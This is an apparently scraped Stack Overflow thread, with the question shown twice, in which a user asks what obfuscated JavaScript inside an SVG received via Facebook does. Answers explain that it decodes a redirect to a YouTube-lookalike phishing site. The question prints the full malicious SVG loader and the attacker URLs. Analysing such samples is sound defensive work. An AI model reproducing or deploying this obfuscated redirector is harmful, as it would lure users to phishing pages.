admin管理员组

文章数量:1310480

I recieved facebook message with two files (SVG pictures), and I clicked one of them (I do not know why :( ). Then new tab with red dot opened, and then I was immediately redirected to some site pretending to look like Youtube (/?fb_dsa).

Then I downloaded the .svg file using the "Save link as..." function. It seems it is some javascript code embeeded into svg, so I am posting it here (I do not know JS very well):

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  ".1/DTD/svg11.dtd">
<svg version="1.1" xmlns="">
  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
    function xcxxy(gyqbv,hzrgh,ktjrf){
      var qixua = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6";
      var vyqsvo = ["rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS\/I0g_CL?pxAyn","RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS\/9lB7sexVm","n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN\/s","C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl\/dKa35rsX=Ey","9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1\/y=kFODRKN24c5oX37_hAIVg",":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk\/Pjch3CGLHJd9p"];
      var bnkdip = "";
      var igrqm = 0;
      while(vyqsvo[igrqm]){
        igrqm++;
      }
      var kwwtmh = 0;
      while(gyqbv[kwwtmh]){
        var jikaig = 0;
        var axfnq = -1;
        while(qixua[jikaig]){
          if(qixua[jikaig] == gyqbv[kwwtmh]){
            axfnq = jikaig;
            break;
          }
          jikaig++;
        }
        if(axfnq >= 0){
          var abxnk = 0;
          var wjtfca = -1;
          while(vyqsvo[kwwtmh%igrqm][abxnk]){
            if(vyqsvo[kwwtmh%igrqm][abxnk] == gyqbv[kwwtmh]){
              wjtfca = abxnk;
              break;
            }
          abxnk++;
          }
          bnkdip += qixua[wjtfca];
        }else{
          bnkdip += gyqbv[kwwtmh];
        }
        kwwtmh++;
      }
      var evhrt = "";
      for(izqfrv=hzrgh;izqfrv<bnkdip.length;izqfrv++){
        evhrt += bnkdip[izqfrv];
      }
      bnkdip = evhrt;
      return bnkdip;
    }
  var obejok = window;
  var iyysri = xcxxy("sUTA:Gkb106SzH",11,false);
  var leizjp = xcxxy("kBB?5S:Uh",1,false);
  var nvanw = xcxxy(".Pi/MksB2n7jIta0d",13,false);
  obejok[iyysri][leizjp][nvanw] = xcxxy("siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD",3,false);
  ]]></script>
</svg>

I don't really know javascript, and I wanted to ask what it can do. Could it hurt me? Thank you very much

I recieved facebook message with two files (SVG pictures), and I clicked one of them (I do not know why :( ). Then new tab with red dot opened, and then I was immediately redirected to some site pretending to look like Youtube (http://kerman.pw/?fb_dsa).

Then I downloaded the .svg file using the "Save link as..." function. It seems it is some javascript code embeeded into svg, so I am posting it here (I do not know JS very well):

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3/2000/svg">
  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
    function xcxxy(gyqbv,hzrgh,ktjrf){
      var qixua = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6";
      var vyqsvo = ["rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS\/I0g_CL?pxAyn","RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS\/9lB7sexVm","n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN\/s","C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl\/dKa35rsX=Ey","9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1\/y=kFODRKN24c5oX37_hAIVg",":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk\/Pjch3CGLHJd9p"];
      var bnkdip = "";
      var igrqm = 0;
      while(vyqsvo[igrqm]){
        igrqm++;
      }
      var kwwtmh = 0;
      while(gyqbv[kwwtmh]){
        var jikaig = 0;
        var axfnq = -1;
        while(qixua[jikaig]){
          if(qixua[jikaig] == gyqbv[kwwtmh]){
            axfnq = jikaig;
            break;
          }
          jikaig++;
        }
        if(axfnq >= 0){
          var abxnk = 0;
          var wjtfca = -1;
          while(vyqsvo[kwwtmh%igrqm][abxnk]){
            if(vyqsvo[kwwtmh%igrqm][abxnk] == gyqbv[kwwtmh]){
              wjtfca = abxnk;
              break;
            }
          abxnk++;
          }
          bnkdip += qixua[wjtfca];
        }else{
          bnkdip += gyqbv[kwwtmh];
        }
        kwwtmh++;
      }
      var evhrt = "";
      for(izqfrv=hzrgh;izqfrv<bnkdip.length;izqfrv++){
        evhrt += bnkdip[izqfrv];
      }
      bnkdip = evhrt;
      return bnkdip;
    }
  var obejok = window;
  var iyysri = xcxxy("sUTA:Gkb106SzH",11,false);
  var leizjp = xcxxy("kBB?5S:Uh",1,false);
  var nvanw = xcxxy(".Pi/MksB2n7jIta0d",13,false);
  obejok[iyysri][leizjp][nvanw] = xcxxy("siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD",3,false);
  ]]></script>
</svg>

I don't really know javascript, and I wanted to ask what it can do. Could it hurt me? Thank you very much

  • javascript
  • windows
  • facebook
  • google-chrome
  • svg
Share Improve this question edited Sep 22, 2018 at 20:03 Kazuki 1,49216 silver badges42 bronze badges asked Nov 20, 2016 at 22:54 videokojotvideokojot 5515 silver badges15 bronze badges 6
  • Don't you have that "Youtube look alike" in your browser history? – Jimmy Adaro Commented Nov 20, 2016 at 23:02
  • 2 window.top.location.href = "http://mourid./php/trust.php", causing your browser to navigate to that address, which redirects you to various others. The script on its own can't hurt you, but using the site it ultimately takes you to may. Imitating Youtube, it may be trying to phish for your credentials or may try to serve a file that isn't a video. – Jonathan Lonowski Commented Nov 20, 2016 at 23:18
  • @JimmyAdaro yes, I found it. it is: http://kerman.pw/?fb_dsa . – videokojot Commented Nov 21, 2016 at 8:19
  • 1 Can I ask why the downvote - so I can avoid it in the future? – videokojot Commented Nov 21, 2016 at 8:23
  • 1 FYI - if you serve user-uploaded SVGs from your own domain (which maybe you shouldn't), sending the header Content-Security-Policy:default-src *; would say to the browser "you can load scripts, images, or whatever else from any URL you want, but don't execute inline code in <script> tags". It's a very (probably overly) permissive CSP, but would prevent malicious SVGs from doing damage. See content-security-policy. – Nathan Long Commented Mar 7, 2017 at 14:49
 |  Show 1 more ment

2 Answers 2

Reset to default 8

You are correct that the SVG file has embedded javascript. SVG's are Vector graphic files which will draw a image in the browser based on the instructions inside the file. The SVG you found contains obfuscated javascript to hide what is actually going on.

At a glance from what I can see, it is a script to open a new browser window and load a new URL, so by itself, it is not dangerous, it all depends on what website it is redirecting you to, and what scripts are set to kick off when you reach the website.

So in short, it CAN harm your puter given the assumption that the site you're being redirected to is malicious.

I hope that helps.

The embedded script redirects your browser to the website http://mourid./php/trust.php, but the script alone is not malicious. The function xcxxy decodes obfuscated strings, and the final line of code is an obfuscated version of window["top"]["location"]["href"] = "http://mourid./php/trust.php", which redirects you to that site. I advise you not to run the script because obfuscation is sometimes used to hide malicious code from plain sight. (Source: Wikipedia)

本文标签: windowsMalicious javascript embeded in SVGwhat it doesStack Overflow

版权声明:本文标题:windows - Malicious javascript embeded in SVG - what it does? - Stack Overflow 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.betaflare.com/web/1741826340a2399664.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。